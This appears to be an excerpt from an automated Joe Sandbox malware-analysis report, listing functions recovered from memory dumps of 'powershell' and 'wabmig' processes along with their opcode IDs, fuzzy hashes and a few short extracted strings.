                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40790a5f99f0a1d6fff1d01bc4af002297e862fae0bd3f88db98fdb07a7e2317
                                        • Instruction ID: c77906edd9869d31bf462fccb63ea368d47451bdc044bf1479394d36558594e8
                                        • Opcode Fuzzy Hash: 40790a5f99f0a1d6fff1d01bc4af002297e862fae0bd3f88db98fdb07a7e2317
                                        • Instruction Fuzzy Hash: FB124B70B102149FD754DB58C854F9ABBB2FBC9704F508098EA09AF391CB72ED828F95
                                        Function 06EF13AF Relevance: .4, Instructions: 418COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56484c03812ca642a0914a39cc0b1db895c39c7db5192459cc711a91dfe1f6e6
                                        • Instruction ID: 3e4284d76796649dae239c12bd2dc9d0911649cfe0a6e67fbc88544b7ba35991
                                        • Opcode Fuzzy Hash: 56484c03812ca642a0914a39cc0b1db895c39c7db5192459cc711a91dfe1f6e6
                                        • Instruction Fuzzy Hash: 19026B70B11358DFEB54CB58D444F9ABBB2BF84718F148059EA05AB391CB72ED41CB91
                                        Function 06EF4348 Relevance: .3, Instructions: 289COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e054e14988d85daef7ee44b06e41b3488273fc79b9155bcc936d4d908dbfbd67
                                        • Instruction ID: dce710353c90344e150436b149c2764db389395fdcc344ac41182253d54922be
                                        • Opcode Fuzzy Hash: e054e14988d85daef7ee44b06e41b3488273fc79b9155bcc936d4d908dbfbd67
                                        • Instruction Fuzzy Hash: 7BB17B70E20204CFEB54CB58C444B9EBBF2AB88708F15D159EA056F796CB71ED46CB91
                                        Function 0424F3A4 Relevance: .3, Instructions: 273COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2f86e7ec870207428bfebfe06164b06c024f562fd9eb55418fe87d2374dce8f
                                        • Instruction ID: 5a49388a405b24b4b01a0dd0703ff8c4b043d93e3f0e4f4f1987cfdc64c80f49
                                        • Opcode Fuzzy Hash: b2f86e7ec870207428bfebfe06164b06c024f562fd9eb55418fe87d2374dce8f
                                        • Instruction Fuzzy Hash: 5CB16B70F1020ACFDB58CFA8DA8179DBBF1EFC8714F158529E814AB254EB74A845CB91
                                        Function 0424731C Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3cc0c2d548e505c48881fe60daa2107662d4559f770204edca55179951890f4
                                        • Instruction ID: e2abd04302711ce57983576a24c7712598c9103f67e3a9435c5faa913d056675
                                        • Opcode Fuzzy Hash: e3cc0c2d548e505c48881fe60daa2107662d4559f770204edca55179951890f4
                                        • Instruction Fuzzy Hash: 0EA15835B10209CFDB18DFA4D984AADBBB2FFC4310F118559E816AB364DB74AD49CB80
                                        Function 06EF60D0 Relevance: .2, Instructions: 241COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a5229dc9768a9f7405a00056a2b70d9c233bb4d287e5e257e05e5bbc3d51e3e
                                        • Instruction ID: cad16698d2b98ae1720ea04b582a89caee18d2c34f36cdfe67bd56b0c83785ce
                                        • Opcode Fuzzy Hash: 2a5229dc9768a9f7405a00056a2b70d9c233bb4d287e5e257e05e5bbc3d51e3e
                                        • Instruction Fuzzy Hash: 12919F70A10205CFE754CB98D445A9EBBF2EFC9744F149069DA05AF752CB72EC41CBA1
                                        Function 06EF60CB Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e67da1e1c5fe7c75dd2a8bc5ceeb6ec455609d8b4dea0f20f0fb9bf70e126e50
                                        • Instruction ID: a3d0d9695b207d2e6fee6b3c5692ec6cbe8c1b8b1787b0688d3e34c2f8d03603
                                        • Opcode Fuzzy Hash: e67da1e1c5fe7c75dd2a8bc5ceeb6ec455609d8b4dea0f20f0fb9bf70e126e50
                                        • Instruction Fuzzy Hash: EA81BC70A10305DFE754CB58D584A9EBBF2EFC9308F149069E905AB752CB32EC40CBA1
                                        Function 04242AA0 Relevance: .2, Instructions: 207COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c058808fd45a2a14fdca35b9d422473a59086bfd87338b7c12bfb8d1ac5edb22
                                        • Instruction ID: 22353b018f432a8f7f1c0a35292810cbae7870b499ad2f1eeaf4a68244eb69b4
                                        • Opcode Fuzzy Hash: c058808fd45a2a14fdca35b9d422473a59086bfd87338b7c12bfb8d1ac5edb22
                                        • Instruction Fuzzy Hash: D7916D74A00609CFCB19CF59C494AAEFBB1FF88354B248699E915AB365C731FC51CBA0
                                        Function 04247BD6 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2a36a3c6bfbd5ff7e4032bee1236c92841dfea5ade23f8faf1b777382c8f1fb
                                        • Instruction ID: 06363e7600d146b724c167d3f714ba93b8e2291c5377902ec576b831bcbcd6a5
                                        • Opcode Fuzzy Hash: b2a36a3c6bfbd5ff7e4032bee1236c92841dfea5ade23f8faf1b777382c8f1fb
                                        • Instruction Fuzzy Hash: 43711930A11209DFDB18DFA5D884AADBBB2FFC8304F158569D412AB7A0DB71AD46CB40
                                        Function 04247A53 Relevance: .2, Instructions: 169COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e4401dcfec1acf86487fc1f2c7fe6932016ac749a6c7bfc88c272d4bcc7b61c
                                        • Instruction ID: 8a4bcb7c0b8c7ecbaee7fb5f587eb983feb753cbeec0e6488dbb977a5f54a02d
                                        • Opcode Fuzzy Hash: 6e4401dcfec1acf86487fc1f2c7fe6932016ac749a6c7bfc88c272d4bcc7b61c
                                        • Instruction Fuzzy Hash: 1A618F30A00209DFCB18DF69D884AAEBBB6FFC8304F158969D415AB751DB71AD46CB90
                                        Function 042477F9 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8fa487b86c91aa3b7820e5d7405528a40c6bbbe7b6835bce43441b9bf797d32
                                        • Instruction ID: 7ed4ea8e8bfddf9e5341bb5dbf4a5a88a41889be262c873ad086327875c44540
                                        • Opcode Fuzzy Hash: e8fa487b86c91aa3b7820e5d7405528a40c6bbbe7b6835bce43441b9bf797d32
                                        • Instruction Fuzzy Hash: 7041AE35B00215DFDB19DF64D854AAEBBB6EFC9354F084469E406EB7A0CB35AD01CBA0
                                        Function 06EF5DCC Relevance: .1, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1a9ada0a0f889e2a663ec11f04725986f17184dc70188b6da4c5ed1e2952736
                                        • Instruction ID: 7c08037356429f7ceba575272aa10ec783b9ede414b7cd137b10880f0fd0991c
                                        • Opcode Fuzzy Hash: f1a9ada0a0f889e2a663ec11f04725986f17184dc70188b6da4c5ed1e2952736
                                        • Instruction Fuzzy Hash: 05416C31B24341CFF7508B7098107AA7BA19FE1258F285066DA52CF6A2DF3AC945C371
                                        Function 06EF0B00 Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e57b140c6f78323138e813845264d6046062f878fbc01bedb3d5a3f5b155c549
                                        • Instruction ID: 944f10eb53a068f212c733a3c730a49ead1739d8dcb02f57c269bd5500827901
                                        • Opcode Fuzzy Hash: e57b140c6f78323138e813845264d6046062f878fbc01bedb3d5a3f5b155c549
                                        • Instruction Fuzzy Hash: 93312C31B103158BDB589B798C107AEF795EFC4219F10883ACA09DB645EF31D945C7E1
                                        Function 04242BB0 Relevance: .1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 360e894afdfe618781250ae91ec66c57f7517115e1c8cb35aa2f9efdee8af3a0
                                        • Instruction ID: 455737ca9430c5008cd16aecf4b32083974bbede1d83d2600ce04745fba48a68
                                        • Opcode Fuzzy Hash: 360e894afdfe618781250ae91ec66c57f7517115e1c8cb35aa2f9efdee8af3a0
                                        • Instruction Fuzzy Hash: 64412574A10109DFCB09CF59C594AAAFBB1FF88314B118699E905AB364C732FC51CFA0
                                        Function 06EF7F18 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 729a71f7480f1c33057f342fe322e3833ecf48e57b2caa6040f026a572fae7d9
                                        • Instruction ID: 2c417eb2b7816067af511f43abf9f612526547015a62338de6e153615d78f4c1
                                        • Opcode Fuzzy Hash: 729a71f7480f1c33057f342fe322e3833ecf48e57b2caa6040f026a572fae7d9
                                        • Instruction Fuzzy Hash: EF313732B24304CFFBA45B68E4006B6B7B2AFC1658B24507AD3028B691EE72C951C791
                                        Function 06EF47E8 Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02a31e2a171fda5b67d1d61fb2d89c4f803926c63d3b1f9cc83f7c8591ebafc6
                                        • Instruction ID: 8fbb096b0db622995e8a7f94ff715c8dfb0130055809affaa69776e3877736e1
                                        • Opcode Fuzzy Hash: 02a31e2a171fda5b67d1d61fb2d89c4f803926c63d3b1f9cc83f7c8591ebafc6
                                        • Instruction Fuzzy Hash: A6318F30B50214DFE7049BA8C855BAF7AA3AFC5754F108024EA01AF792CFB5DD428BA1
                                        Function 06EF1020 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b74ef32301ed11c502c6116aa57295d0dc332b06e86ac0d6d3a3d9f8e556410
                                        • Instruction ID: cfb1eab3f7d0cfbf3ff262f79a7c42c0506b33d775af803ab43a6cccc62cd796
                                        • Opcode Fuzzy Hash: 0b74ef32301ed11c502c6116aa57295d0dc332b06e86ac0d6d3a3d9f8e556410
                                        • Instruction Fuzzy Hash: C521993172035EDBEB64477A4810BB7B686DBC4709F64802AE705CB280EDB6CC50C3A1
                                        Function 06EF101F Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c2f7af19a74d601d9f88acfe0b33590d3ccbb7340b28be385c8aa4b63b46273
                                        • Instruction ID: 58b6d445eb172752dded0ac08a5c2f5657513d4b1c057de57f37fc77e471457e
                                        • Opcode Fuzzy Hash: 5c2f7af19a74d601d9f88acfe0b33590d3ccbb7340b28be385c8aa4b63b46273
                                        • Instruction Fuzzy Hash: D0119B3571035EE7EB6407664901BB77A86DFC5744FA48029BB059B2C0EDBADD90C3B1
                                        Function 06EF5E61 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3e99bbde36ea7dc2021f776f714452dfc2e6deeaa1ba2235aec1ce5e25e7ba2
                                        • Instruction ID: b27b01265abca62ec1ce17defaf74016be87b1e0e0b3ae7d066dcf19d2458db8
                                        • Opcode Fuzzy Hash: e3e99bbde36ea7dc2021f776f714452dfc2e6deeaa1ba2235aec1ce5e25e7ba2
                                        • Instruction Fuzzy Hash: 0F110672B102528BEB50D768A8016AAF752DBE5318F20C47AEB57CB691DF329911C3A1
                                        Function 042495A8 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce847753e23eb6ea0c1b5be6a2bc7d3e7bbff8346cc3c0acf5b07740af4f7f69
                                        • Instruction ID: 8b1bbee92c14b79e13e48431869be19d4a9883db844d6532633b666fe5feabe9
                                        • Opcode Fuzzy Hash: ce847753e23eb6ea0c1b5be6a2bc7d3e7bbff8346cc3c0acf5b07740af4f7f69
                                        • Instruction Fuzzy Hash: 49211A74A05219CFCB04DFA8D5909AEBBB5FF89310B148595D909EB352C731FC41CBA1
                                        Function 04249597 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d208a5196e329aa6661cf8e9911d1dcb0fb25b7bd6de741b41fcff5425527be7
                                        • Instruction ID: 5818f002d9179428405b4659d891db303b2e146afcb55aa249f48a68c82293aa
                                        • Opcode Fuzzy Hash: d208a5196e329aa6661cf8e9911d1dcb0fb25b7bd6de741b41fcff5425527be7
                                        • Instruction Fuzzy Hash: 5F2117B4A00209DFCB04CF98D9809AEBBF5FF89310B158199E909AB352C731FD41CBA1
                                        Function 06EF0DD0 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a87542cfcf29b1d3d6fe2878872e80f0e5c60c37a78c95a82bb7cc5dc10b99e
                                        • Instruction ID: 33d3867c462eac62814fc2d66b8760df59198fb25206e63be05a24b1b279471a
                                        • Opcode Fuzzy Hash: 5a87542cfcf29b1d3d6fe2878872e80f0e5c60c37a78c95a82bb7cc5dc10b99e
                                        • Instruction Fuzzy Hash: CB017B367203148BDB5047AAD810176FB96DFC5226F14C03FD744C7642DA32D845C7A0
                                        Function 06EF7F7C Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4caf71b51d55808fe346d47ddc09d8cb3304185b6e5de098421ce52bcc2adcb4
                                        • Instruction ID: 0bf7a287822e7d8bcfad1d1b4fcff53b4213d697c8d3f84b196180bf1a0326ca
                                        • Opcode Fuzzy Hash: 4caf71b51d55808fe346d47ddc09d8cb3304185b6e5de098421ce52bcc2adcb4
                                        • Instruction Fuzzy Hash: 4B01D633A39341DFFFF50B60A4007F277719F82659FA920A6D7014B191E7758591C3A2
                                        Function 0424EDCB Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a8db59f2859ad3ae537842ed8e237c51006d019860bad2680974f7a3f868c3f
                                        • Instruction ID: 4ccfc5cd3294baa1d6c22ac2a5efca8b4c854b960203aefdc447724486287ca4
                                        • Opcode Fuzzy Hash: 8a8db59f2859ad3ae537842ed8e237c51006d019860bad2680974f7a3f868c3f
                                        • Instruction Fuzzy Hash: DF11C330F2015ADBEF38DE94D9887ACB772FF85229F161429C401B6190AB747989CB12
                                        Function 06EF8309 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1586c24440fcc65b2a0d420962a8dbf6fcecda9263df8488bd3131547fdce516
                                        • Instruction ID: bd75aff96e9f0029cca54900fc8301c71a37a31fe552e7710f36bb485ed96108
                                        • Opcode Fuzzy Hash: 1586c24440fcc65b2a0d420962a8dbf6fcecda9263df8488bd3131547fdce516
                                        • Instruction Fuzzy Hash: DF012B31F15360CBE35113E81815B9F27228BC1A55B050066CA019F765DF718D02C3E7
                                        Function 06EFD54C Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b184c16bae20d519675da10b2e3562fe947fa2d25371ed1c3e41f74d00d2596a
                                        • Instruction ID: f8c14524ab8881567005fb791acd98de8b5b8770eec4cb97cdf85ede35b67173
                                        • Opcode Fuzzy Hash: b184c16bae20d519675da10b2e3562fe947fa2d25371ed1c3e41f74d00d2596a
                                        • Instruction Fuzzy Hash: 18015734640315CFE7908B54CC44BDAB7A2AF85704F108498EA05AF791CBB69E81CF91
                                        Function 06EF1BAF Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4f8b117da2eaa4d113379dbfd14043c6473abc631fe02973e75859f86695ace
                                        • Instruction ID: dbe5be5e79ddb920e4b66c51840354be82780229dcf34768efb75e631726a0cc
                                        • Opcode Fuzzy Hash: d4f8b117da2eaa4d113379dbfd14043c6473abc631fe02973e75859f86695ace
                                        • Instruction Fuzzy Hash: 74B012311451404FC201CB50C860440FB609F82124328C4CBD804CB253CB27DD03C700

                                        Executed Functions

                                        Function 00833E40 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk
                                        • API String ID: 0-2889131009
                                        • Opcode ID: a57e09eea145165f778779c19d07c9b678edf4143dd05a519875769b80b89820
                                        • Instruction ID: cff1046089529e60ef76d6a486dca643ce333618727520a3b0ef1e256aeec51f
                                        • Opcode Fuzzy Hash: a57e09eea145165f778779c19d07c9b678edf4143dd05a519875769b80b89820
                                        • Instruction Fuzzy Hash: DE916A70E006498FDF14CFA9C9957AEBBF2FF88314F148129E815E7294EB749985CB81
                                        Function 0083AAB0 Relevance: 3.0, Instructions: 3036COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58142da85788dbba04516b347b03a7dcf71045f2a703789b2c2d396a9a5a58e3
                                        • Instruction ID: 1b32f23b8144c088990609a2c6bfdb5ff36e0d9172f186882ed89ce05638a8de
                                        • Opcode Fuzzy Hash: 58142da85788dbba04516b347b03a7dcf71045f2a703789b2c2d396a9a5a58e3
                                        • Instruction Fuzzy Hash: 5C630B31D10B1A8ADB11EF68C884699F7B1FF99300F11D79AE458B7121EB70AAD4CF81
                                        Function 00834A58 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A
                                        • API String ID: 0-3625649603
                                        • Opcode ID: b7be0dbaad608e52d9b1772fcdee7f836ea1bbe286e0600c4d377a687bb17081
                                        • Instruction ID: 114d003e73e58ab20f6b9e7604951692341b9f6b8807863de833c9f2675c9739
                                        • Opcode Fuzzy Hash: b7be0dbaad608e52d9b1772fcdee7f836ea1bbe286e0600c4d377a687bb17081
                                        • Instruction Fuzzy Hash: 33B13C70E002198FDF54CFA9C88579DBBF2FF88714F249129D815E7294EB78A845CB81
                                        Function 0083E370 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A
                                        • API String ID: 0-3652387145
                                        • Opcode ID: 172cdaabf0398ae43031cc48c71906f8f8b387bd0eb0ba9dfd4ed53fa68ccb47
                                        • Instruction ID: bcca1bad5fd4a20a6ad31421623d39b43dbcaa60177dbb956a658ddcfa39db92
                                        • Opcode Fuzzy Hash: 172cdaabf0398ae43031cc48c71906f8f8b387bd0eb0ba9dfd4ed53fa68ccb47
                                        • Instruction Fuzzy Hash: 60B1C170B00258DBDB1CAB79985967E7BA7BFC8700F15846EE406E7385DE38DC029B91
                                        Function 0083AAAA Relevance: 1.4, Instructions: 1417COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f836967f88c65768c2d88471b359926b3a7ccb8352b78e4c3afc177c566490e
                                        • Instruction ID: d0e54d92e02cad60e9b8b2ee1000c83cfdd29229fc0f867a3f20020987e4d445
                                        • Opcode Fuzzy Hash: 7f836967f88c65768c2d88471b359926b3a7ccb8352b78e4c3afc177c566490e
                                        • Instruction Fuzzy Hash: F8E2E831D10B1A8ADB50EF68C884699F7B1FF99300F11D79AE458B7121EB70AAD4CF81
                                        Function 008347D0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W6A$W6A$\Vhk$\Vhk
                                        • API String ID: 0-2994003189
                                        • Opcode ID: b6e113b1fcab8a24dab5663371d696e1e191aa72f0fb472af2933b90f2f129c2
                                        • Instruction ID: 2b88df7b9704256b9a8d0551400a0042e5a316360c567abebf91e0e1cb0cf23c
                                        • Opcode Fuzzy Hash: b6e113b1fcab8a24dab5663371d696e1e191aa72f0fb472af2933b90f2f129c2
                                        • Instruction Fuzzy Hash: EA715B70E00259CFDB14CFA9C885B9EBBF2FF88714F149129E815E7254EB74A845CB91
